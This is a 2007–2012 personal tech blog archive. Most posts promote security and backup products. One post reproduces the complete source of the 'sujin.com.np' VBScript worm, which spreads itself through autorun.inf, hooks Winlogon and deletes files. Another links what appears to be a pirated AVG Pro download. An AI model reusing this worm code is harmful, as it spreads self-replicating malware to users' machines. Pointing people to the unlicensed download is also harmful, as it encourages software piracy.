Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Friday, May 11, 2012

Trend Micro Enterprise Security - Maximize Business Value

I’ve been using Trend Micro Internet Security for a long time now and I have to say it is one of the best internet securities you can find. Trust me when I say this, because I am a tech guy and I’ve used a lot of different antivirus and internet security software in my lifetime. The maker of Trend Micro Internet Security is Trend Micro Inc., who also have other security related products and services like Trend Micro Worry-Free Business Security, Office Scan, etc. Their sole mission is to make this world absolutely safe to exchange digital information which is pretty good for a security company.

Anyways I was recently asked by a friend to recommend security software for his organization and there was no doubt I would recommend anything than Trend Micro Enterprise Security. Even thought I hadn’t used the Enterprise Edition of Trend Micro I was sure it’d be a good choice because I have tried the home edition.

I was going through the website to find in details about Trend Micro Enterprise Security and I found out few very good stuffs. The enterprise edition secures your overall enterprise; from cloud to mobile devices. Unlike in home, an enterprise is a big place and it is vulnerable security wise in many ways. Your first target will be greater flexibility with less cost, for which you’ll need cloud and virtualization. Whatever you do, you’ll need good security. But then, in office people bring their own laptops, PDA and mobile devices. Maintaining security in that level; so called Consumerization of IT is a very difficult thing to do because of difficulty with technology such as mobile device management. If you use traditional perimeter security, your enterprise can easily be breached and important data can be leaked or lost.

Trend Micro Enterprise Security is the just what you need to solve all these problems that your enterprise might go through. It is one answer to all your security related questions and I am not only the one saying that; my friend who I suggested is pretty happy with it too.

Wednesday, February 1, 2012

Beware of using other’s software!!!

I am a big fan of Mig33 software. It’s nothing but an IM just like MSN or Yahoo messenger but has some other extra features too. One of the fascinating things about mig33 chat rooms is that we can kick other user which is only if certain number of people agrees for the kick. But the problem is that within the time frame if other users also don’t kick the intended id, s/he will survive the kick and will be safe for some time.
So, this is when I went on looking for software that would make sure that intended person is kicked because it’s not only about the time but also you credit gets deducted with start of a kick. Anyways after much search I found a software that would solve this problem. POKEA was just what I needed. With it I could login from multiple ids and then enter the chatrooms in a sec and do mass flooding. Also I could target an id and kick it in a second using my logged in ids. I was very satisfied with this software but I didn’t know that I had fallen into a trap. Next day when I tried to login in mig33, it said my password was invalid. Same was the answer to all my other ids. I hadn’t given my password to anyone and before I used this software this had never happened to me. It was a shock that the passwords of my 20 mig33 ids were changed. Then I realized that this POKEA developer must have injected some code in the program that my password must have been saved to their database and then it was just a matter of time they comfortably changed my password to whatever they wanted. Thank god that mig33 has that feature of sending the password to the mobile no. and also I had the same number till now to revive the password. Also the password of other ids were had been changed to the same password, so I could change the passwords and revive my ids else it would have been a disaster for me. They could have done anything with my ids and even could have created misunderstandings between me and my buddies.
So, what everyone should understand is that before downloading free software and using them one should beware of the consequences it could bring. They may be spreading virus or even leaking your precious data.

Thursday, January 12, 2012

500 Worst Passwords Poster

Something different for a change!!! I just came across etsy.com where they were selling poster of 500 worst passwords according to Mark Burnett (author of Perfect Password Selection and Protection)) for 38 bucks a piece. If it were for me, I'd add up some more on it. Anyways, if anyone like to they better do it fast as they got very limited edition of this cool poster.

Tuesday, January 10, 2012

Http Torrents

I am sure everybody use torrent. For those who don’t know what torrent is; simply it’s the most popular way of downloading big sized files, even movies and games. All those who use torrent, they know that they need to install a BitTorrent client applications to download thru torrent. And they also have to go thru different hassles like firewall problem, seeder leaving you, etc.

Well I just stumbeled into a site HttpTorrents.com which actually is an online torrent application that doesn’t require installation on your system at all. Wow yeah? I thought so too. It turns the torrent file that you need into an easy downloadable http-link and you get:

  • Guaranteed fast speed
  • Guaranteed 100% download

And you don’t have to worry about:

  • Uploading
  • Blocking
  • Ratings
  • Waiting

A slight problem though. I tried using it many time; the first or which is entering the torrent hash into the search field but I don't seem to get any result. It seems there are not much files or options there to download. The concept is pretty unique but not sure if it's going to work. Also you have to pay the sum of $9.90 for the single month. Only then you'll get a premium account. I am not still sure how to use it and whether we can pause the download and resume it later (I am sure we can as it's a torrent application even though it's online). Still if it were free, then it would have been better. hehe

Friday, February 20, 2009

AVG Anti-Virus Pro 8.0.233 ( Free till year - 2018)

Get complete protection from the most dangerous threats on the internet - worms, viruses, trojans, spyware, and adware.

Antivirus and antispyware protection for Windows from the world’s most trusted security company. Use the Internet with confidence in your home or small office.

  • Easy to install and use
  • Protection against viruses, spyware, adware, worms and trojans
  • Real-time security while you surf and chat online
  • Top-quality protection that does not slow your system down
  • Free support and service around the clock and across the globe
  • Compatible with Windows Vista and Windows XP.


Features:

Integrated protection

  • Anti-Virus: protection against viruses, worms and trojans
  • Anti-Spyware: protection against spyware, adware and identity-theft
  • Anti-Rootkit: protection against hidden threats (rootkits)
  • Web Shield & LinkScanner: protection against malicious websites


Easy-to-use, automated protection
Real-time protection, automatic updates, low-impact background scanning for on-line threats, and instant quarantining or removal of infected files ensures maximum protection. Every interaction between your computer and the Internet is monitored, so nothing can get onto your system without your knowledge. AVG scans in real time:

  • All files including documents, pictures and applications
  • E-mails (all major email clients supported)
  • Instant messaging and P2P communications
  • File downloads and online transactions such as shopping and banking
  • Search results and any other links you click on


Internet use with peace of mind
The new web shield checks every web page at the moment you click on the link to ensure you’re not hit by a stealthy drive-by download or any other exploits. All links on search results pages in Google, Yahoo, and MSN are analyzed and their current threat level is reported in real time before you click on the link and visit the site.

The best Windows protection - trusted by millions of users
AVG’s award-winning antivirus technology protects millions of users and is certified by major antivirus testing organizations (VB100%, ICSA, West Coast Labs Checkmark). View all AVG awards & certifications.


Download AVG Anti-Virus Pro 8.0.233 by :

http://rapidshare.com/files/193398995/AVG_Anti-Virus_Pro_8.0.233.rar.html

Source : Antivirusz Blog

Thursday, November 20, 2008

90-day license key for Kaspersky Anti-Virus 2009

Kaspersky surely is one of the best Anti-Virus and Internet Security software available in the market. Well, I am using AVG free edition but that’s because it’s free. If had enough money to spend then no doubt I’d have got Kaspersky for my computer. Anyways as I was browsing thru the net, I got this free 90-day license code for Kaspersky Anti-Virus 2009. So, those of you who want to use a full version of Kaspersky Anti-Virus 2009 for 90, here is how you can get it.

  • Visit this promotion page. The form is in Polish so those who don’t know Polish translate the page side by side in English for clear understanding.
  • Fill up the form. The promotion code to get free Kaspersky Anti-virus 2009 License code is: KIS2009-538491
Soon you’ll receive an email that will consist of a free, working 90-day license key for your Kaspersky Anti-Virus 2009. Hurry up!!! This is a limited offer.

Friday, May 23, 2008

Save 50% in a bundle of Norton Products


Good news that I’ve subscribed to Symantec Store, else I wouldn’t know about this fabulous deal that they are giving out to Norton Products. Today again I got this e-mail from the store with the subject ‘Save 50% and get an added layer of protection’. I checked it out just to see what the buzz is about and all I can say now is that I’m so happy that I checked it out. You can get a fabulous 50% discount on the total price if you buy a bundle of Norton Internet Security™ (which costs around $69.99) and Norton System Works™ Basic Edition (which costs around $49.99). So, even though the total price comes to be $119.98 if you buy then separately, if you buy both of them it will cost just a mere $59.99 plus shipping and tax (if applicable). Isn’t this a great offer? But don’t you sit and wait. This offer is valid just till May 31, 2008. And one more thing that I forgot to mention is that it is Valid in the US and Canada only. Chow!!!

Thursday, May 1, 2008

How to remove messengerskinner.exe?

MessengerSkinner.exe is a part of MessengerSkinner software. MessengerSkinner is a potentially unwanted application that may drop a copy of Trojan.Skintrim on to the computer. It may also display pop-up advertisements on the computer. Here is a full process on how to remove it.

1. Temporarily Disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Uninstall Messenger Skinner
a) Click Start > Settings > Control Panel or Start > Control Panel (this varies with the operating system).
b) In the Control Panel window, double-click Add/Remove Programs.
c) Click Messenger Skinner to remove.
d) Click Add/Remove, Change/Remove, or Remove (this varies with the operating system). Follow the prompts.

4. Reboot computer in SafeMode
5. Run a full system scan and clean/delete all infected file(s)
6. Delete/Modify any values added to the registry.
Navigate to and delete the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”[RANDOM CHARACTERS]” = “c:\documents and settings\administrator\local settings\application data\[RANDOM CHARACTERS].exe [RANDOM CHARACTERS]”
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”messengerskinner” = “C:\Program Files\MessengerSkinner\MessengerSkinner.exe”

Navigate to and delete the following registry subkeys:
HKEY_CURRENT_USER\Software\LanConfig
HKEY_CURRENT_USER\Software\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\[RANDOM CHARACTERS]

7. Exit registry editor and restart the computer.

8. In order to make sure that threat is completely eliminated from your computer, carry out a full scan of your computer using AntiVirus and Antispyware Software. You can also try Online Virus Scanner which doesn’t need any installation.

Wednesday, April 16, 2008

PC Security

Nowadays, security of the data is a prime concern for every computer individual or a big business house. It is one of reasons why the traditional paper and documents are being changed/converted into files and folder in the hard drives. Still, computer isn’t safe from hackers and sometimes unintentional harms even by the authorized personnel.
PC Security is software that is designed for Windows platform to help you protect your system against any types of intrusions. The PC Security for Windows (tm) offers a complete data security protection by performing the following functionality:

o File locking.
o Folder locking.
o Internet locking
o Window locking.
o Shortcut/Program locking.
o System locking (the whole computer) with different timers and Hot Key.
o Explorer Control.
o Restricted System.
o Intruder Detection with Alarm.
o Context Menu support (mouse right click to lock and unlock).
o Flexible and complete password protection.
o Drag and Drop support.

Hardware/Software Requirements:

Computer: IBM or compatible
Processor: Pentium/compatible or higher
RAM 32MB or higher
Operating System: Windows XP/95/98 or higher, Windows NT 4.0 or higher

Wednesday, January 9, 2008

Recover Your Deleted Files with “File-Saver”

Sometimes what happens is that some kind of virus wipes your hard drive or you accidentally press “Shift + Delete” and delete some file that were actually useful and that you may later need. This is a terrible situation to be in when the data is very important. If it was in the recycle bin then it wasn’t a big problem, we could easily restore the file back but what if we have even emptied the recycle bin. In such cases we have a small problem and what we need is recovery software that can recover deleted files and our data.
File-Saver is one of such many softwares that are found in the market. Its work is predictable. As the name says it saves your files. It can instantly restore hundreds of deleted files from your PC – doesn’t matter whether a computer virus deleted the files or you've emptied the Recycle Bin, or pressed “Shift” button while deleting the files.

Features:
1. QUICKLY Recover Hundreds of Deleted Files
2. INTUITIVE Windows Explorer mode
3. INSTANT Image Preview
4. ENHANCED Recovery Algorithms
5. PREDICTIVE Recovery
6. RESTORE with folder structure
7. FULL SUPPORT for any drive

It is the World's smartest undelete tool and this great software ca be yours at just $19.95 if you order before midnight Wednesday. So, hurry up and grab the offer.

Tuesday, January 8, 2008

Save $77 in Evidence Blaster – Software that erases your Internet History

There are many third part softwares available which can even restores the files that are deleted. These softwares are very useful when you have been attacked by a virus and your important files have been deleted but what if the same softwares are used against you to track your activities. Your computer stores the information of your entire visit to sites, the files you opened, your e-mail accounts and many other things that you may not want other to see or know. And even if you delete the temporary internet files and cookies, they still can be recovered which can be very dangerous.
So, what you need is software that can completely erase your track from the computer and Evidence Blaster is that software. With it you can clean your computer system with just a mouse click. It’s a complete hard drive cleaner.

What Evidence-Blaster 2008 does:
• Clear your browser history - Internet Explorer, Netscape, FireFox
• Erase your browser cache
• Eliminate all your system cookies
• Remove your visited and typed URL list
• Clean the hidden, locked INDEX.DAT file
• Overwrite all AutoComplete information
• Zap all Windows temporary files
• Clear documents, history and "Find" searches from the Start menu
• Empty your Recycle Bin and the Windows clipboard
• Wipe out Outlook and Netscape e-mail histories
• Ensure deleted files can NEVER be recovered from your machine
• Erase entire directories using Government-strength removal techniques

Its actual price is $149.95 but if you order before midnight Tuesday, January 8th 2008 you can get the full version of Evidence-Blaster 2008, plus lifetime support, for just $22.95 saving a massive $77 on our retail price of $99.95. Isn’t that awesome?

Monday, January 7, 2008

Unlock Word, Excel, Access files

Well, this is a situation that I too face normally. I have a very bad memory and I tend to forget things. I usually keep my document in Word and Excel format and to protect its content from people I usually put a password to open it. But when I’ve not opened the documents for a long time, I tend to forget the password to open the file.

This was really troubling me because I can’t just leave the files exposed to everyone too because they contain very sensitive information and even though I put a password due to my forgetting nature later even I was not being able to open those documents. But today, I came across a site called Password-Studio.com and I come to know about software called Password-Studio Pro which is one of the world’s most powerful Office password recovery tool. For Access, it’s easy. This software cracks the Access password instantly. For Word and Excel files it uses "Smart Dictionary" and "Bruteforce" hacking methods which takes a little while but guarantees the success.

So, if you are looking for any Word, Access or Excel password recovery then Password-Studio Pro is just what you need.


Hide IP address software

Internet is a very insecure place actually as there are many kinds of risk out there to which you are exposed to. When you are browsing a page of sending an e-mail you are constantly broadcasting your IP. Your IP address can be instantly traced back to your Internet service provider (proof), who is required to provide your personal details following certain requests and this can lead to a disaster.
So, how are you supposed to be secure while surfing in the internet? Well, there is a software “Hide My IP Address” which as its name says - Hide IP address. It’s actually a specially-modified browser, based on Firefox. With this you can surf in the internet without being visible to others. No one can trace anything or get your details. What this software does that it automatically routes all of your Internet traffic through at least 2 ultra-secure, ultra-fast anonymous servers using the powerful and well-known Tor network for total privacy.

Some featured of “Hide My IP Address” are:

  • INSTANTLY HIDE YOUR IP ADDRESS - With Just One Click!
  • RUN ANYWHERE - Even On a Portable USB Pen!
  • SUPER FAST SERVERS - Over 15 Million Anonymous Servers!
  • AUTOMATIC TRACE REMOVAL - No Logs or History Files!
  • BUILT-IN PRIVACY TOOLS - Customize to Your Hearts Desire!
  • CRUSH IDENTITY THEFT - Stop Yourself Getting Stolen
  • TOTAL LIFETIME UPDATES - No Hidden Costs or Fees!
  • TOTAL LIFETIME SUPPORT - Contact Us 24/7 for Help!

So, get this software and feel free to surf.


Friday, January 4, 2008

The Importance of Online Backup

Everybody knows that storage and backing up of data are one of the most important things that need to be focused on in today scenario. What most of the people do is store their data and important information in flash drives, CD-ROMs, DVDs or hard drive so that they can be retrieved later on when needed. But a thing that they keep forgetting is that these things are exposed to damage. If there is a fire in your house and if the hard drive gets burnt, then there is no chance that the data can be retrieved from it. So, the new concept that’s taking over is the concept of online storage and backup. It’s simply storing your data online so that you can retrieve it later when needed or recover the data in case any accidents occur and the data in your computer gets deleted or overridden.

One of the popular names when it comes to online storage and backup is IBackup. Specially, it provides storage and backup for small businesses and its desktop applications provide easy drag-n-drop and familiar explorer interface to work with online data than other online storage providers. Extensive enterprise-class feature set including snapshots, which enable you to view older copies of data, Network Drive for easy drag-n-drop operations, Sub-Accounts, Web Folders, sharing and collaboration options are just some of the features that it provides. To know it up close you have to use it. I assure that you won’t regret this decision of yours. Give a shot to IBackup.

Thursday, January 3, 2008

One More Way To Clear Window’s Login Password

Today I was just surfing the net and I came across Calvyn’s blog. You know how crazy I am about computer tweaks. So, I went to its ‘Tips and Tricks’ category and there I found a new way to clear Window’s login password. I know many other ways but not this one. This is just a simple command prompt commands and it’s not that big trick either. The problem with this is that you have to be logged in to the Windows already. While resetting it won’t asks for the old password though. Here’s how you do it:

  • Click Start -> Run -> type cmd (this opens a Command Prompt window)
  • Type ‘net user’ (without the quotes)
  • You will see the available user in your PC
  • To clear that particular user password
  • Type ‘net user ’ (e.g. net user admin hello)

(In the e.g. above ‘admin’ is the username and ‘hello’ is the password)

But a slight different that I wanted to give my readers is with the ability to give a blank password using the same command. If you want to have a blank password there has to be brought a little twist with the command. For this:

  • Type ‘ net user * ’ (e.g. net user admin *)
  • This will ask you to type the password and re-type again to confirm. You can also put a blank password in here.

Enjoy and practice this trick. It is practice that makes a man perfect.

Tuesday, December 18, 2007

Pro930 Online Ups 3000va

To meet the requirement of the network system to the power, prolink has developed a new generation ups- pro online series. It adopts 32 bets data-bus microprocessor with robust processing power that is capable of detecting and controlling quickly and accurately all movement of UPS to ensure product high reliability. Owe to the use of the double-conversion circuit design, the power used by load is the pure sine wave power by stabilizing voltage and stabilizing frequency and noisy signals filter.

Furthermore, pro online series UPS and the network server is connected together through the RS232 communication port and power monitoring software, which offers power status available at any time. Moreover, it achieves the intelligent functions such time self inspection, automatic disk-saving, automatic time switch on/off and automatic power status recordation, etc, so it achieves the zero distance of communication between user and UPS. When utility power is disconnected, UPS inform the server immediately and gets ready to be switched off and automatically saves all data before performing the normal switch-off instruction. Even in an unattended network environment, UPS can ensure data safety of the network system.

Thursday, December 13, 2007

Fluorescent light powered wireless cams

I’ve heard about surveillance cameras that don’t need any wires and some cameras are so small that they can fit in your pen. This is something new to talk about a wireless camera that is powered by fluorescent light. This new type of camera was released be Japan's NEC which surprisingly powered by fluorescent light. The camera has a ring-shaped part that attaches to the bulb and gets its power from the magnetic field created by the AC source. And that’s not it. This camera has some built-in 802.11b WiFi capabilities to stream all that video (or, more specifically, an image every ten seconds) back to a PC, which can presumably be used to monitor little things going around and you don't have to run over power cables too. Cool!!! Huh?

Wednesday, December 12, 2007

The solutions for ‘sujin.com.np’ virus

Just few days ago I mentioned about this virus called changes the homepage of Internet Explorer to ‘sujin.com.np’ and does some other manipulation in the registry. Well, I encountered this so called virus aned I alsofound of its solution through various resources. To remove this virus you can follow the process below :

1. From the start menu click ‘Run’ -> type ‘Regedit’

2. Registry Editor will open

3. In the Registry Editor, go to Edit menu and press find

4. In the find dialog box type - virusremoval.vbs and press find next button
5. The search will end at some folder in the registry at the key - "userint"; doubleclick it; you will find many paths separated by commas - eg: c:windows/system32/userinit.exe,c:/windo... and so on. Among those paths you will find "C:\windows\system32\virusremoval.vbs". Delete the path. Ensure that remaining paths are unaltered so that your genuine scripts are not affected.

6. Press F3 (find next) to see if the same path exists somewhere else in your registry. If found again at some other place remove the path there also.

7. Repeat F3 until you get a message that search has finished.
6. Change your home page to your usual one. You will notice that though your home page has stopped from changing back to ‘sujin.com.np’, still your title bar is showing ‘sujin.com.np’.

7. To change this back to normal, first change your homepage, and again open the ‘Registry Editor’ and press find in edit menu and type ‘sujin.com.np’ without quotes. You will find the key - "Window Title". Double click the key and type "Windows Internet Explorer" or any other text you would like to have in the title bar. Please note that you have to change the key at two places. Press find next f3 till you receive the message that search has finished to ensure that you have changed at both the places.

Well, this is a pretty long procedure. Instead of doing all this you can just download a scanner for this virus from http://worldlink.com.np/support/download/software/Scanner.exe and run a scan and this virus will be easily removed.

Wednesday, December 5, 2007

‘sujin.com.np’ virus or what?

It was just today that I noticed whenever I opened my Internet Explorer; the title of my browser shows ‘sujin.com.np’ and my home page has been changed to sujin.com.np. I was scared for a moment. What could have happened? Did someone hacked into my explorer and stealing my private data? I have free edition of AVG installed and I am regularly updating it but it couldn’t detect the so called ‘sujin.com.np’ virus.
Anyways, I knew that the only thing that could solve my problem was the internet and as I predicted I found many solutions. Actually, this might got into my computer through someone’s flash drive or something. It was just some script programmed by some guy from Nepal in Visual Basic that changed some registry settings and copied itself to all drives in root directory.
The VBS file in notepad looked like this:

'************************************************* *****************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'************************************************* *****************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'************************************************* *****************
'************************************************* *****************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives, InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,fi les,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools","0","REG_DWORD "
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=ro ot Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub


A post in the boyutal’s blog says that it’s just a harmless VBScript file installed in your computer which just:

1.) Modifies registry settings to do tasks such as Disabling the Access To Taskbar, Setting The Start Page of Internet Explorer to "sujin.com.np" and modifies the UserInit settings to execute Virusremoval.vbs

2.) Stores a copy of itself to all Drives in root directory.

3.) Removes all vbs files in Windows directory and Root directory and all inf files in root directories of drives.

4.) Removes ravmon.exe, sxs.exe, winfile.exe and run.wsh.(Maybe these are the files of some malware that its author wants to remove)

5.) Stores VirusRemoval.vbs in root and adding the autorun.inf to make sure that it auto executes if it's installed in a removable disk (i.e. flashdrives).

And that’s it........it's harmless ..

I don’t know I still think there is something fishy about this.

-------------------------------------------------------------

Read about Terrie Spieker or Orlando Figes.

-------------------------------------------------------------

IDrive Online Backup

Backing up the data is one of the most crucial things to do if you are a computer user. Not just for big business houses but backups are equally importance for individual users too. In today’s technology dominated world more than money and gold, data has got value. So, it has to be properly backed up in case unfortunately the hard drive might crash and all your data are puff gone. Well, there are many third-party softwares though that can recover the data from a crashed hard drive but what if there is a fire and your whole computer got burnt. Then any software can’t get you your data back. Therefore we have to take preventive measures right from now. The most appropriate answer that I found was the online backup. Just as its name says, it’s backing up your data online so that you can recover the data in case any accidents occur and the data in your computer gets deleted or overridden.

IDrive is one of the leading online backup companies which offer two kinds of services – in one you can enjoy 2GB of backup space absolutely free without any catch and the second one is the unlimited backup (for $4.95/month) which is for small businesses or individuals with very large backup needs. IDrive has got more features than any other online back ups companies and the recent enhancements including near real time backup of frequently changing data or CDP (Continuous Data Protection)and ability to manage multiple accounts from single admin account has made is invincible in compare to its competitors. Now hurry up and try IDrive, it’s time you back up your data.